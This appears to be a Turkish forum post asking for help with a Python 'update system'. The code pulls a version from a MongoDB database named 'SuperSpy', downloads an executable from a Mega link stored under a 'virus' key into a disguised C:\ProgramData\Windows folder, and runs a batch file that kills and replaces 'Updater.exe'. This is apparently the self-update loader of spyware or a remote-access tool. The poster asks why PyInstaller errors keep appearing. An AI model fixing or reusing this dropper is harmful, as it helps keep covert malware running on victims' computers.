Yardım lazım Güncelleme sistemi

import pymongo,os
from mega import Mega
Version = "1.0"
USERNAME = "Ertu"
strr = r"""
taskkill /f /IM Updater.exe
del C:\ProgramData\Windows\Updater.exe
ren C:\ProgramData\Windows\s.exe Updater.exe
start Updater.exe
"""

if Version != pymongo.MongoClient("mongodb+srv://******@superspy.zpebk.mongodb.net/")["SuperSpy"]["Info"].find_one({"whatIs":"versionInfo"})["programVersion"]:
  try:link = pymongo.MongoClient("mongodb+srv://******@superspy.zpebk.mongodb.net/")["SuperSpy"]["Users"].find_one({"username":"Ertu"})["mega"]["virus"]["updater"]
  except Exception as e:print(e)
  try: Mega().download_url(link,"C:/ProgramData/Windows","s.exe")
  except Exception as e:print(e)
  try:
    bat = open("saver.bat","w")
    bat.write(strr)
    bat.close()
    os.startfile("saver.bat")
  except:pass

Programın versiyonu databasedeki versiyona eşit değilse güncel programı silip yenisiyle değiştirmek istiyorum. Bakınca sorun çıkmayacak gibi duruyor. saver.bat ı kaydediyor fakat sonrasında 3 4 saniye aralıklarla pyinstallerin hatası çıkıp çıkıp okunmadan geri gidiyor. Herhangi bir döngü olmamasına rağmen görev yöneticisinde program hep açık gözüküyor. elimle saver.bat ı çalıştırdığım zaman sorunsuz şekilde çalışıyor. Sebebi nedir ? nasıl halledebilirim ?